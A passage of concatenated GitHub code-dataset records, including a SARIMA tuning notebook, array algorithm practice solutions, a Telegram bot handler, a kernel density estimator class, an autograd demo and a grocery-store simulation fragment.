+ End)\nprint('ARIMA: {}'.format(pdq[1]))\nprint('ARIMA: {}'.format(pdq[2]))\nprint('ARIMA: {}'.format(pdq[3]))\nprint('ARIMA: {}'.format(pdq[4]))\n\n\n# ## Finding the Optimal Set of Hyperparameters \n\n# In[44]:\n\n\nAIC=list()\nBIC=list()\npara=list()\nLihood=list()\nprint(Bold + 'Training ARIMA with a Number of Configurations:'+ End)\nfor param in pdq:\n mod=sm.tsa.statespace.SARIMAX(closePrice,order=param,seasonal_order=(0, 0, 0, 0), \n enforce_stationarity=False, enforce_invertibility=False)\n results= mod.fit()\n para.append(param)\n AIC.append(results.aic)\n BIC.append(results.bic)\n Lihood.append(results.llf)\n print('ARIMA{} - AIC:{} - BIC:{} - Log likelihood: {}'.format(param,results.aic, \n results.bic,results.llf))\n \nprint(Bold +'The Optimal Choice Suggestions:'+End)\nprint('The minimum value of Akaike Information Criterion (AIC):{}'.format(min(AIC)))\nprint('The minimum value of Bayesian Information Criterion (BIC): {}'.format(min(BIC)))\nprint('The maximum value of Log likelihood: {}'.format(max(Lihood)))\nprint(Bold + 'The Values of AIC and BIC in Descending Order:'+End)\nModSelect=pd.DataFrame({'Hyperparameters':para,'AIC':AIC,'BIC':BIC, 'Log likelihood':Lihood}).sort_values(by=['AIC','BIC','Log likelihood'],ascending=False)\nModSelect\n\n\n# # Fitting the optimal SARIMA model\n\n# In[46]:\n\n\nmod = sm.tsa.statespace.SARIMAX(closePrice, order=(2, 1, 1),enforce_stationarity=False,\n enforce_invertibility=False)\n\nresults = mod.fit()\n\nprint(Bold + 'The estimated ARIMA(2,1,1) Model'+ End)\n#print(results.summary().tables[1])\nprint(results.summary())\n\n\n# # Performing Model Diagnostics\n\n# We should always run model diagnostics to investigate any unusual behavior.\n\n# In[49]:\n\n\nresults.plot_diagnostics(figsize=(17,15))\nplt.show()\n\n\n# Our primary concern is to ensure that the residuals of our model are $\\textbf{uncorrelated}$ and $\\textbf{normally distributed with zero-mean}$. If the seasonal ARIMA model does not satisfy these properties, it should be further improved.\n# \n# In this case, our model diagnostics suggest that the model residuals are not normally distributed, based on the following:\n# \n# 1. The residuals over time (top left plot) seem to display an obvious pattern (a downward trend) and might not be an obvious white-noise process.\n# \n# \n# 2. In the top right plot, we see that the red KDE line is far from the N(0,1) line (where N(0,1) is the standard notation for a normal distribution with mean 0 and standard deviation of 1). This is a good indication that the residuals are not normally distributed. \n# \n# 3. The Q-Q plot on the bottom left shows that the ordered distribution of residuals (blue dots) does not follow the linear trend of the samples taken from a standard normal distribution N(0, 1). Again, this is a strong indication that the residuals are not normally distributed.\n# \n# see more $\\text{Q-Q Plot}$ at https://en.wikipedia.org/wiki/Q%E2%80%93Q_plot\n# \n# 4. The autocorrelation (i.e. correlogram) plot on the bottom right shows that the time-series residuals have low correlation with lagged versions of themselves overall, but several episodes have high correlation with their own lagged values.\n# \n# Those observations lead us to conclude that the model does not yet produce a fully satisfactory fit of our time series.\n# \n# Some parameters of our seasonal ARIMA model should therefore be changed to improve the fit. 
For example, our grid search only considered a restricted set of parameter combinations, so we may find better models if we widen the grid search.\n# \n# For now, the model is not good enough, since the diagnostics suggest that the model residuals are not close to normally distributed.\n","repo_name":"phuongvnguyen/Optimizing-the-SARIMA-algorithm","sub_path":"Optimize_SARIMA.py","file_name":"Optimize_SARIMA.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"71308555638","text":"import math\n\n\ndef isValidSubsequence(array, sequence):\n # 0(n) time, 0(1) space, where n is length of array\n # Two pointers, let l = sequence, r = array\n l = r = 0\n\n while l < len(sequence) and r < len(array):\n if sequence[l] == array[r]:\n l += 1\n r += 1\n continue\n r += 1\n\n return l == len(sequence)\n\n\n\"\"\" Question 3 - sortedSquaredArray: Given a sorted array, square each number and return the squares in sorted order. Note there might be negative numbers\n array = [-6,2,3,4,5] => [4,9,16,25,36]\n Method 1 - 0(nlogn) time, 0(1) space - Loop & square the numbers in place (array[i] = n ** 2), then sort the resulting array\n Method 2 - 0(n) time, 0(n) space - Two pointers. Initialize the output array with 0s, then loop from the end index:\n if the absolute value at the left-most index is greater than the right-most value, square the left-most and insert it; otherwise square the right-most \n\"\"\"\n\n\ndef sortedSquaredArray(array):\n # 0(n) time, 0(n) space\n output = [0 for _ in range(len(array))]\n\n l, r = 0, len(array) - 1\n\n for i in reversed(range(len(array))):\n smallest = array[l]\n largest = array[r]\n\n if abs(smallest) > abs(largest):\n output[i] = smallest**2\n l += 1\n else:\n output[i] = largest**2\n r -= 1\n\n return output\n\n\n\"\"\" Question 4 - An algorithm challenge. Given an array of team pairs that competed, and an array of results (0 & 1), where 1 = home team won, 0 = away team won. \n Return the overall best team, i.e. the one with the most wins, assuming each win is worth 3 points\n Method 1 - Use a hashmap to track each team's points, \n e.g: competitions=[\n ['HTML', 'C#'], \n ['C#', 'Python'], \n ['Python', 'HTML']\n ] \n results=[0, 0, 1] --> \"Python\"\n\n\"\"\"\n\n\ndef tournamentWinner(competitions, results):\n # 0(n) time, 0(k) space - where n is number of competitions, k is number of teams\n # hash the winners points\n\n bestTeam = \"\"\n hashMap = {bestTeam: 0}\n\n for match, result in zip(competitions, results):\n result = 0 if result == 1 else 1 # swap the result index\n\n team = match[result]\n\n if team in hashMap:\n hashMap[team] += 3\n else:\n hashMap[team] = 3\n\n if hashMap[team] > hashMap[bestTeam]:\n bestTeam = team\n\n return bestTeam\n\n\n\"\"\" Question 5: Non-constructible change. \n Given an array of positive integers representing the coins in your possession, write a function that returns the minimum sum of change\n that you CANNOT create. 
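(Equivalently: the smallest positive amount that no subset of the coins can sum to.) 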
The array may contain duplicate values.\n \n e.g [] --> 1\n [1,2,5] --> 4\n [5, 7, 1, 1, 2, 3, 22] --> 20\n Method: 0(nlogn) time | 0(1) space\n - Sort the coins and track the largest change C we can already create; when we meet a coin greater than C + 1, \n the amount C + 1 can never be created, so return it\n\"\"\"\n\n\ndef nonConstructibleChange(coins):\n coins.sort()\n\n currentChangeCreated = 0\n for coin in coins:\n # i.e. the previous coins cannot build currentChangeCreated + 1, and this coin is already greater than it\n if coin > currentChangeCreated + 1:\n return currentChangeCreated + 1\n currentChangeCreated += coin\n\n return currentChangeCreated + 1\n\n\nprint(nonConstructibleChange([1, 2, 4, 7]))\n\n\"\"\" Question 6 - 3sums. Given an unsorted array and a target, return all the triplets that sum up to the target, in sorted order\n [12,3,1,2,-6,5,-8,6], target = 0 => Solution=> [[-8,2,6], [-8,3,5], [-6, 1,5]] \n Method 1: Like 2sums, you can use a hashMap, or cubic time 0(n^3) with 3 loops. \n Method 2: Sort, then loop through; for every index, run two pointers over the rest of the array (summing the current index with the left and right pointers).\n Keep moving the pointers until the target sum is found, else exit the inner loop and move on to the next index\n 0(n^2)time, 0(n)space \n Method 3: Use the combinations method from itertools\n\"\"\"\n\n\ndef threeNumberSum(array, targetSum):\n # 0(n^2)time, 0(n)space\n result = []\n\n array.sort()\n\n for i in range(len(array) - 1):\n left = i + 1\n right = len(array) - 1\n while left < right:\n calcd = array[i] + array[left] + array[right] # <== FORMULA POINT\n if calcd == targetSum:\n result.append([array[i], array[left], array[right]])\n\n left += 1\n right -= 1\n\n if calcd > targetSum:\n right -= 1\n if calcd < targetSum:\n left += 1\n\n return result\n\n\n\"\"\" Question 7 - Smallest Difference\n Given 2 arrays, return one number from each array such that their absolute difference is closest to 0\n NOTE: The absolute difference of 2 integers is the distance between them on the real number line\n Consider the number line: the diff of -5 and 5 is 10; the diff of -5 and -4 is 1\n arr1 = [-1,5,10,20,28,3]\n arr2 = [26,134,135,15,17] solution => [28,26]\n Method 1 - 0(n * m) time, 0(1)space - Quadratic looping through arr1 and arr2; if the difference is lower than the last recorded difference,\n overwrite it, along with the pair itself\n Method 2 - 0(nlogn + mlogm) time, 0(1) space - Sort both arrays. Two pointers. While the left and right pointers are within bounds. 
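Advance the pointer at the smaller value, since moving the larger one could only widen the gap. 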
Continue to find the \n difference between the two current numbers; if it is 0, return the pair, otherwise record it if it is lower than the previous best.\n \n we're shifting pointers because we are trying to obtain the closest difference to 0 \n\"\"\"\n\n\ndef smallestDifference(arrayOne, arrayTwo):\n # Method 1\n # 0(n * m) time, 0(1) space\n\n value = float(\"inf\")\n result = []\n\n for i in range(len(arrayOne)):\n for j in range(len(arrayTwo)):\n difference = (arrayOne[i]) - (arrayTwo[j])\n absDiff = abs(difference)\n\n if absDiff < value:\n value = absDiff\n result = [arrayOne[i], arrayTwo[j]]\n\n return result\n\n # Method 2 (unreachable after the return above; kept for reference).\n # 0(nlogn + mlogm) time, 0(1) space\n\n arrayOne.sort()\n arrayTwo.sort()\n\n left = right = 0\n smallest = float(\"inf\")\n smallestPair = []\n\n while left < len(arrayOne) and right < len(arrayTwo):\n firstNum = arrayOne[left]\n secondNum = arrayTwo[right]\n\n if firstNum < secondNum:\n current = secondNum - firstNum\n left += 1\n elif secondNum < firstNum:\n current = firstNum - secondNum\n right += 1\n else:\n return [firstNum, secondNum] # if diff is 0.\n\n if current < smallest:\n smallest = current\n smallestPair = [firstNum, secondNum]\n\n return smallestPair\n\n\n\"\"\" Question 8 - Move element to end \n Given an array, move all occurrences of a target element to the end. The order of the elements doesn't matter.\n [2,1,3,2,4,2,1,2], toMove = 2. Solution => [1,3,4,1,2,2,2,2]\n Method 1 - Two pointers. On the left side keep looping until the target is found, on the right side keep looping until a non-target is\n found, then swap them. \n\"\"\"\n\n\ndef moveElementToEnd(array, toMove):\n # This maintains the order\n elementIdx = 0\n for idx in range(len(array)):\n if array[idx] != toMove:\n swap(idx, elementIdx, array)\n elementIdx += 1\n\n return array\n\n\ndef swap(i, j, array):\n array[i], array[j] = array[j], array[i]\n\n\ndef moveElementToEnd(array, toMove):\n # 0(n) time, 0(1) space\n left, right = 0, len(array) - 1\n while left <= right:\n # if not target, please move to next, same idea to skip duplicated number in a rotated array with duplicates.\n while left < right and array[left] != toMove:\n left += 1\n while left < right and array[right] == toMove:\n right -= 1\n\n array[left], array[right] = array[right], array[left]\n\n left += 1\n right -= 1\n\n return array\n\n\n\"\"\" Question 9 - Monotonic Array\n Given an array, determine if it is monotonic. \n A monotonic array is one that is entirely non-decreasing or entirely non-increasing. \n Equal adjacent elements are still regarded as monotonic.\n Method 1 - 0(n) time, 0(1) space.\n First scan for any place where the array increases and record it with a flag; if an increase exists anywhere, \n any decrease elsewhere makes the array non-monotonic, and if no increase exists the array is non-increasing\n\"\"\"\n\n\ndef isMonotonic(array):\n # - take care of empty or single element array, they're monotonic\n # - scan for any increase and record it with a flag\n # - if an increase exists and any adjacent pair decreases, the array is not monotonic\n\n if len(array) <= 2:\n return True\n\n is_increase = False\n\n l, r = 0, 1\n while r < len(array):\n if array[l] < array[r]:\n is_increase = True\n break\n l += 1\n r += 1\n\n for i in range(len(array) - 1):\n if is_increase and array[i] > array[i + 1]:\n return False\n\n return True\n\n\n\"\"\" Question 10 - Spiral Matrix Traverse\n Given a 2D array, collect all numbers into an array. 
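Traverse in spiral order: top row left-to-right, right column top-to-bottom, bottom row right-to-left, then left column bottom-to-top, shrinking the bounds after each pass.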
\n \n Method 1 - 0(n) time, 0(n) space.\n \n\"\"\"\n\n\ndef spiralTraverse(array):\n \"\"\"\n [\n sC eC\n sR [1, 2, 3, 4]\n [12,13,14,5]\n [11,16,15,6]\n eR [10, 9, 8,7]\n ]\n\n result => [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\n \"\"\"\n result = []\n startRow, endRow = 0, len(array) - 1\n startCol, endCol = 0, len(array[0]) - 1\n\n while startRow <= endRow and startCol <= endCol:\n # top\n for col in range(startCol, endCol + 1):\n result.append(array[startRow][col])\n\n # right\n for row in range(startRow + 1, endRow + 1):\n result.append(array[row][endCol])\n\n # bottom\n for col in reversed(range(startCol, endCol)):\n # Make sure bottom row != top row (avoid double-collecting a single remaining row)\n if startRow == endRow:\n break\n result.append(array[endRow][col])\n\n # left\n for row in reversed(range(startRow + 1, endRow)):\n # Make sure left column != right column\n if startCol == endCol:\n break\n result.append(array[row][startCol])\n\n startRow += 1\n startCol += 1\n endRow -= 1\n endCol -= 1\n\n return result\n\n\n\"\"\" Question 11 - Longest Peak\n Write a function that takes in an array of integers and returns the length of the longest peak in the array\n \n A peak is where adjacent elements are strictly increasing\n until they reach a tip (the highest value in the peak), at which point they become strictly decreasing\n \n [1,4,10,2] is a peak\n [4,0,10] not a peak\n [1,2,2,0] not a peak\n [1,2,3] not a peak because there is no strictly decreasing part after 3\n \n e.g : array=[1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3] --> 6 // 0, 10, 6, 5, -1, -3\n The tip of a peak is the point where the values stop increasing and start decreasing.\n l p r\n [1,2,3,3,4,0, 10, 6,5,-1,-3,2,3] -> 0,10,6,5,-1,-3, maxPeak= 6,\n there is a peak happening at 10\n Method 1 - 0(n) time, 0(1) space.\n - start from the second element\n\"\"\"\n\n\ndef longestPeak(array):\n maxPeak = 0\n i = 1\n end = len(array) - 1 # we need i to stop before the last\n\n while i < end:\n isPeak = array[i - 1] < array[i] and array[i] > array[i + 1]\n # array[i] is not the tip of a peak. 
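That is, it does not rise strictly above both neighbours. 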
Go FORWARD\n if not isPeak:\n i += 1\n continue\n\n # array[i] is a tip: expand outward on both sides until the peak condition is broken or we go out of bounds\n left = i - 2\n while left >= 0 and array[left] < array[left + 1]:\n left -= 1\n\n right = i + 2\n while right < len(array) and array[right] < array[right - 1]:\n right += 1\n\n peakLength = right - left - 1 # -1 because left expanded beyond what we want\n\n maxPeak = max(maxPeak, peakLength)\n\n # continue from where right stopped\n i = right\n return maxPeak\n\n\n\"\"\"Question 12 - Array of products \n A function that returns an array of the same length, where each element in the output array\n is equal to the product of every other number in the input array\n [5,1,4,2] => [8, 40, 10, 20]\n\"\"\"\n\n\ndef arrayOfProducts(array):\n output = []\n for i in range(len(array)):\n output.append(math.prod(array[0:i] + array[i + 1 :]))\n return output\n\n\n\"\"\"Question 13 - First duplicate value \n Given an array of integers between 1 and n, where n is the length of the array, return the number\n that is duplicated first.\n [2,1,5,2,3,3,4], 2 appeared first\n Method 1 - 0(n^2) time 0(1) space\n Method 2 - 0(n) time 0(n) space, Using hashSet or hashMap\n Method 3 - 0(n) time, 0(1) space \n - By subtracting 1 from each number, it represents an index into the array,\n - Whatever number you find at that index, flag it as negative \n - The next time you encounter a number at an index that's already negative, you know you've already seen the number that produces that index\n\"\"\"\n\n\ndef firstDuplicateValue(array):\n # we're subtracting 1 because we're dealing with indices and the question says values run from 1 to n\n for n in array:\n # get index\n absN = abs(n)\n if array[absN - 1] < 0:\n return absN\n array[absN - 1] *= -1\n\n return -1\n\n\n\"\"\" Question 14 - Merge-overlapping intervals \n\n e.g: [[1,2], [3,5], [4,7], [6,8], [9,10]] -> [[1,2], [3,8], [9,10]] \n [[1,4], [6,9], [5, 10]] --> [1,10]\n Method : 0(nlogn) time and 0(n) space\n - Compare the incoming interval to the last saved interval. \n - If the start of the incoming is less than/equal to the end of the last saved, overwrite the last saved end with the maximum of the two ends. \n\"\"\"\n\n\ndef mergeOverlappingIntervals(intervals):\n intervals.sort(key=lambda x: x[0])\n output = []\n idx = 0\n\n while idx < len(intervals):\n if not output:\n output.append(intervals[idx])\n else:\n # if the start of the current interval is less than or equal to the end of the last saved\n if intervals[idx][0] <= output[-1][1]:\n output[-1][1] = max(intervals[idx][1], output[-1][1])\n else:\n output.append(intervals[idx])\n\n idx += 1\n\n return output\n\n\n\"\"\" Question 15 - Zero sum subarray\n Given an array of integers, write a func that returns a boolean indicating whether there is a subarray whose \n sum is equal to zero (0)\n\n e.g: [-5,-5, 2, 3, -2] --> True // [-5, 2, 3]\n \n Method 1 - 0(n^3) time | 0(n) space (brute force over every subarray)\n\n Method 2 - 0(n) time | 0(n) space \n sums = set([0, -5, -10, -8, -5, ....])\n [-5,-5, 2, 3, -2] \n currentSum = [-5,-10, -8, -5, ...] \n We found -5 again, which is already in the set. 
This means there must be a subarray which sums up to zero:\n the elements strictly after the first occurrence of -5, up to and including the current index, form that subarray \n\"\"\"\n\n\ndef zeroSumSubarray(nums):\n if 0 in nums:\n return True\n\n for i in range(len(nums) - 1):\n for j in range(i + 1, len(nums)):\n subArray = nums[i : j + 1]\n if sum(subArray) == 0:\n return True\n\n return False\n\n\ndef zeroSumSubarray(nums):\n sums = set([0])\n currentSum = 0\n for num in nums:\n currentSum += num\n if currentSum in sums:\n return True\n sums.add(currentSum)\n return False\n\n\n\"\"\" Question 15 - 4sum\n\n Method : 0(n^3) time, 0(n^2) space\n - Like 3 sum, a double for-loop before searching with pointers.\n\"\"\"\n\n\ndef fourNumberSum(array, targetSum):\n output = []\n array.sort()\n\n for i in range(len(array) - 3):\n for j in range(i + 1, len(array) - 2):\n l, r = j + 1, len(array) - 1\n\n while l < r:\n curr = [array[i], array[j], array[l], array[r]]\n currSum = sum(curr)\n if currSum == targetSum:\n if curr not in output:\n output.append(curr)\n l += 1\n r -= 1\n elif currSum > targetSum:\n r -= 1\n elif currSum < targetSum:\n l += 1\n return output\n\n\n\"\"\" Question 16 - Subarray sort\n Given an array, return the start and end indexes of the smallest subarray from the input that needs to be sorted to\n make the entire array sorted. If the entire array is already sorted, return [-1, -1]\n e.g : [0,1,2,5,4,7,3,6,8,9],--> [3, 7]\n The subarray =[5,4,7,3,6] needs to be sorted to make the entire array sorted\n \n Method 1: 0(n) time | 0(1) space\n Note: if one number is found unsorted, that means at least two are unsorted. \n The subarray is dependent on the values that are out of order\n (i.e. where the min and max out-of-order values are supposed to be).\n - The idea is to find the minimum and maximum values that are out of order.\n - Find the position index of where both the minimum value and maximum value are\n supposed to be\n\"\"\"\n\n\ndef subarraySort(array):\n minOutOfOrder = float(\"inf\")\n maxOutOfOrder = float(\"-inf\")\n\n for i in range(len(array)):\n num = array[i]\n # A number is out of order if the previous element is greater than it or it is greater than the next element\n if isOutOfOrder(i, num, array):\n minOutOfOrder = min(minOutOfOrder, num)\n maxOutOfOrder = max(maxOutOfOrder, num)\n\n # check if any out-of-order value was found\n if minOutOfOrder == float(\"inf\"):\n return [-1, -1]\n\n # Now, find the position index\n # where the minimum and maximum out-of-order values are supposed to be\n subarrayMinIdx = 0\n while minOutOfOrder >= array[subarrayMinIdx]:\n subarrayMinIdx += 1\n\n subarrayMaxIdx = len(array) - 1\n while maxOutOfOrder <= array[subarrayMaxIdx]:\n subarrayMaxIdx -= 1\n\n return [subarrayMinIdx, subarrayMaxIdx]\n\n\ndef isOutOfOrder(i, num, array):\n if i == 0:\n return num > array[i + 1]\n if i == len(array) - 1:\n return num < array[i - 1]\n return array[i - 1] > num or num > array[i + 1]\n\n\"\"\" Question 17 - Transpose Matrix\n Given a 2D integer matrix. 
Write a func that returns the transpose of the matrix. \n NOTE: In the transpose of a matrix, the rows become columns and vice versa. \n\n e.g : [\n [1, 2],\n [3, 4],\n [5, 6],]\n -->\n [\n [1, 3, 5],\n [2, 4, 6],\n ]\n \n Method : 0(w * h) time | 0(w * h) space, where w and h are the matrix's width and height\n For every column, walk through all the rows and\n collect the values into a new row, which is then appended to the result\n\"\"\"\n\ndef transposeMatrix(matrix):\n\n result = []\n for col in range(len(matrix[0])):\n newRow = []\n for row in range(len(matrix)):\n newRow.append(matrix[row][col])\n\n result.append(newRow)\n return result \n\n\"\"\" Question 18 - Best Seat\n You walk into a movie theater and you'd like to sit in the row that gives you the most space, and you'd prefer this\n space to be evenly distributed on both sides (e.g. if there are 3 empty seats, you'd sit in the second one)\n\n Given an array representing the theater row, return the seat index of where you should sit. \n NOTE: 1's represent occupied seats, 0's represent empty seats\n\n Assume that someone is always sitting in the first & last seat, and whenever there are two equally good seats, \n you should sit at the smallest index \n\n if there is no seat, return -1 \n\n e.g: array=[1, 0, 1, 0, 0, 0, 1] --> 4 \n seats=[1, 0, 0, 1] --> 1 \n seats=[1, 0, 0, 1, 0, 0, 1] --> 1\n seats=[1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1] --> 3\n \n Method 1: \n Identify the longest continuous subarray of zeros\n - find the longest 0's subarray \n - Save the start and end indexes of the longest 0's subarray\n - return the average, i.e. the middle of both indexes\n\"\"\"\n\n\ndef bestSeat(seats):\n if 0 not in seats:\n return -1\n\n longest = float(\"-inf\")\n indexes = []\n startIdx = 1\n\n while startIdx < len(seats):\n # Found start index\n if seats[startIdx] == 0:\n endIdx = startIdx\n # Find the end index of continuous 0's\n while endIdx < len(seats) and seats[endIdx] == 0:\n endIdx += 1\n length = endIdx - startIdx\n if length > longest:\n indexes = [startIdx, endIdx - 1]\n longest = endIdx - startIdx\n\n startIdx += 1\n\n return sum(indexes) // 2\n","repo_name":"ihonomic/python_workspace","sub_path":"_DSA/AlgoXpert/Arrays.py","file_name":"Arrays.py","file_ext":"py","file_size_in_byte":21229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"1404328859","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message, ParseMode\nfrom asyncpg import Record\n\nfrom app.config import HELLO_MESSAGE, ADMIN_HELLO_MESSAGE\nfrom app.logger import logger\nfrom app.users import crud as users_crud\nfrom .keyboards import main_admin_keyboard, main_keyboard\n\n\nasync def start(message: Message, state: FSMContext):\n if await state.get_state():\n await state.finish()\n\n from_user = message.from_user\n username = from_user.username\n logger.debug(f'{username} started bot')\n\n user: Record = await users_crud.get_user_by_id(user_id=from_user.id)\n\n msg = HELLO_MESSAGE\n reply_markup = main_keyboard\n\n if user:\n logger.debug(f'user: {username} found in db, '\n f'is_admin={user[\"is_admin\"]}')\n if user['is_admin']:\n msg += ADMIN_HELLO_MESSAGE\n reply_markup = main_admin_keyboard\n\n else:\n logger.debug(f'user: {username} not found in db')\n await users_crud.insert_user(user_id=from_user.id,\n username=from_user.username)\n await message.answer(text=msg,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN)\n\n\ndef register_handlers(dp: Dispatcher):\n 
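# /start and /help share this handler; state='*' lets it run from any FSM state.\n    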
dp.register_message_handler(start, commands=[\"start\", \"help\"], state='*')\n","repo_name":"Pampam000/TestTaskChatLabs","sub_path":"app/bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40689723705","text":"#!/usr/bin/env python\nimport numpy\nimport scipy.special\nimport statistics\nimport kde.evaluate as evaluate\n\nclass KDE(object):\n kernels = ['bump', 'cosine', 'epanechnikov', 'gaussian', 'logistic',\n 'quartic', 'tophat', 'triangle', 'tricube']\n\n metrics = ['euclidean_distance', 'euclidean_distance_ntorus']\n\n def __init__(self, training_points, kernel='gaussian', weights=None, \n metric='euclidean_distance', bw=1):\n\n self.set_training_points(training_points)\n self.set_kernel_type(kernel)\n self.set_metric(metric)\n self.bw = bw\n\n # Normalize the weights, making a copy of the array if necessary\n if weights is not None:\n self.weights = numpy.require(weights, dtype=numpy.float64)\n s = self.weights.sum()\n if s != 1:\n self.weights = numpy.copy(weights)/s \n else:\n self.weights = None\n\n def set_training_points(self, training_points):\n self.training_points = numpy.require(training_points, dtype=numpy.float64)\n\n # Make training points two dimensional.\n if self.training_points.ndim > 2 or self.training_points.ndim == 0:\n raise ValueError(\"Training points can only be 1 or 2 dimensional.\")\n elif self.training_points.ndim == 1:\n self.training_points = self.training_points[:, numpy.newaxis]\n elif self.training_points.ndim == 2:\n pass\n\n def set_metric(self, metric):\n if metric not in self.metrics:\n raise ValueError(\"Invalid metric {:s}. Valid metrics include: \\n{:s}\"\\\n .format(metric, repr(self.metrics)))\n self.metric = metric\n\n def set_kernel_type(self, kernel):\n if kernel not in self.kernels:\n raise ValueError(\"Invalid kernel {:s}. Valid kernels include: \\n{:s}\"\\\n .format(kernel, repr(self.kernels)))\n self.kernel = kernel\n\n def evaluate(self, points, cuda=False):\n '''\n Evaluate the kernel density estimate at each point in ``points``\n '''\n # Make sure points is the correct shape\n points = numpy.require(points, dtype=numpy.float64)\n if points.ndim > 2 or points.ndim == 0:\n raise ValueError(\"Dimension of ``points`` must be the same as the \"\n \"training_points.\")\n elif points.ndim == 1:\n points_ = points[:,numpy.newaxis]\n elif points.ndim == 2:\n points_ = points \n\n if points_.shape[1] != self.training_points.shape[1]:\n raise ValueError(\"``points`` has {:d} features while \"\n \"``training_points`` has {:d} features. 
Number of features \"\n \"must be the same.\".format(points_.shape[1],\n self.training_points.shape[1]))\n\n if cuda:\n import kde.cuda.evaluate as cuda_evaluate\n result = cuda_evaluate.estimate_pdf_brute(points_, self.training_points,\n bandwidth=self.bw, \n weights=self.weights,\n metric=self.metric,\n kernel=self.kernel)\n else:\n result = evaluate.estimate_pdf_brute(points_, self.training_points,\n bandwidth=self.bw, \n weights=self.weights,\n metric=self.metric,\n kernel=self.kernel)\n\n # Return array of same shape as input ``points``\n return result.reshape(points.shape[0])\n","repo_name":"ajd98/kde","sub_path":"kde/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"4"} +{"seq_id":"3666083640","text":"__author__ = 'Guanhua, Joms'\nimport os\nfrom real_single_pic import *\nfrom scipy.io import savemat\nimport pickle\nfrom numpy import array\n\n\ndef pic_package_to_mat(input_fldr, file_heading, number_of_file):\n feature = []\n num_super_pixel = []\n dim = []\n for n in range(number_of_file):\n png_file_name = \"%s_%06d.png\" % (file_heading, n)\n path_png = os.path.join(input_fldr, png_file_name)\n dat_file_name = \"%s_%06d.dat\" % (file_heading, n)\n pkl_file_name = \"%s_%06d.pkl\" % (file_heading, n)\n path_dat = os.path.join(input_fldr, dat_file_name)\n path_pkl = os.path.join(input_fldr, pkl_file_name)\n pic_feature, label_dict, pic_dim = single_pic_feature_computation_without_target(path_png, path_dat)\n num_super_pixel.append(shape(pic_feature)[0])\n feature.append(pic_feature)\n dim.append(pic_dim)\n with open(path_pkl, 'wb') as output:\n pickle.dump(label_dict, output, pickle.HIGHEST_PROTOCOL)\n feature = array(feature)\n dim = array(dim)\n\n # save to mat\n feature_explanation = [\"r\", \"g\", \"b\", \"nr\", \"ng\", \"o1\", \"o2\", \"h\", \"s\", \"v\", \"l\", \"a\", \"b\"]\n params_dict = {'feature_vector': feature, 'feature_explanation': feature_explanation, 'feature_dim': [13],\n 'total_pic': [number_of_file], 'num_of_super_pixel': num_super_pixel, 'dim': dim}\n save_path = os.path.join(input_fldr, \"%s_data\" % file_heading)\n savemat(save_path, params_dict)\n\npic_package_to_mat('c:/data_road/testing/uu/', 'uu', 100) # about 25 min to process\npic_package_to_mat('c:/data_road/testing/um/', 'um', 96)\npic_package_to_mat('c:/data_road/testing/umm/', 'umm', 94)\n","repo_name":"archonren/project","sub_path":"preprocess/pic_package_feature_mat_without_target.py","file_name":"pic_package_feature_mat_without_target.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"4683920461","text":"'''\nCreated on Aug 9, 2018\n\n@author: xiongan2\n'''\n#Wrapper Around Numpy\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\nfrom autograd.test_util import check_grads\nfrom autograd import grad\n#Define the function\ndef f(x1, x2):\n return np.sqrt(x1 * x1 + x2 * x2)\n\ndef logsumexp(x):\n max_x = np.max(x)\n return max_x + np.log(np.sum(np.exp(x - max_x)))\n\ndef example_func(y):\n z = y**2\n lse = logsumexp(z)\n return np.sum(lse)\n\n#Computes and checks the gradient for the given values\ncheck_grads(f)(1.0, 2.0)\n\ngrad_of_example = grad(example_func)\nprint(\"Gradient: \\n\", grad_of_example(npr.randn(10)))\n\n# Check the gradients numerically, just to be safe.\ncheck_grads(example_func, 
modes=['rev'])(npr.randn(10))","repo_name":"motein/Pocketin","sub_path":"MachineLearning/DeepLearning/DeepLearningWithPython/chapter9/demo9_2.py","file_name":"demo9_2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31656181844","text":"# Write a program with a function that receives a string containing an e-mail address as a parameter and returns a tuple with the different parts that make up that address. Example: alguien@uade.edu.ar -> (alguien, uade, edu, ar)\n\ndef descomponer_direccion_correo(correo):\n usuario, dominio = correo.split('@')\n dominio_partes = dominio.split('.')\n return (usuario, *dominio_partes)\n\ndireccion_correo = 'alguien@uade.edu.ar'\npartes_direccion = descomponer_direccion_correo(direccion_correo)\nprint(partes_direccion)\n","repo_name":"TobaMedina/Exercises","sub_path":"Exercises.py/Class exercises/Tuples, Dictionaries & Sets - exercises/TP08-02.py","file_name":"TP08-02.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40373777914","text":"from .checkout_line import CheckoutLine\n\nclass GroceryStore:\n \"\"\"A grocery store.\n\n A grocery store contains different types of checkout lines.\n\n === Attributes ===\n @type lines: list[CheckoutLine]\n A list of checkout lines.\n @type last_line_id: int\n The last line picked by a customer to checkout.\n Particularly useful for round-robin assignment scheme.\n @type total_lines: int\n The number of checkout lines in total.\n \"\"\"\n \n def __init__(self, line_counts):\n \"\"\"Initialize a GroceryStore given number of each type of line.\n\n @type line_counts: dict[str, int]\n A mapping from each checkout line type to how many there are.\n Contains the following keys:\n \"cashier_count\", \"express_count\", \"self_count\"\n @rtype: None\n \"\"\"\n self.lines = []\n line_id = 0\n for line_type, line_count in sorted(line_counts.items()):\n for _ in range(line_count):\n self.lines.append(CheckoutLine(line_id, line_type))\n line_id += 